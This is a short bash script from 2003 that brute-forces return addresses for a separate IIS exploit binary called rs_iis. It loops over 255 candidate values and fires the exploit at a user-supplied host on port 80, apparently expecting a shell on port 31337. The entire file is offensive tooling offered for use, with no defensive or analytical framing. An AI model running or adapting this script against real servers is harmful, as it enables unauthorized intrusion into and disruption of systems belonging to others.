#!/bin/bash
# Brute forcing script for rs_iis.c exploit. (c) RoMaNSoFt. 27/03/2003

TIMEOUT=30

if [ $# -ne 1 ] ; then
  echo "Usage: $0 <host>"
  exit
fi

for i in `seq 1 255` ; do
  h=`printf "0x%.2x%.2x" $i $i`
  echo -e "\nTrying with RET=$h"
  ./rs_iis $1 80 31337 $h
  echo "Waiting for $TIMEOUT seconds..."
  sleep $TIMEOUT
done

echo "If you reach this point, exploitation has failed :-)"